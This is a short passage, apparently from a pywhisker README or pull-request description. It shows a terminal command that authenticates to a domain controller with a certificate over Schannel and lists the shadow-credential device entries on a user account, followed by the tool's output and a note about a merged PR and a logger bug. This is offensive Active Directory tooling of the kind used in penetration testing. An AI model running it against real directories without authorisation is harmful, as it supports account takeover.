jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a list
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Listing devices for kflynn
[*] DeviceID: 1e22caec-4696-5c0a-8de4-6566fd89dea3 | Creation Time (UTC): 2024-10-29 17:28:07.373425
```

Note: This commit includes an existing PR by [KillingTree](https://github.com/ShutdownRepo/pywhisker/pull/22). 
"Logger" is still misconfigured for the function "ldap3_kerberos_login".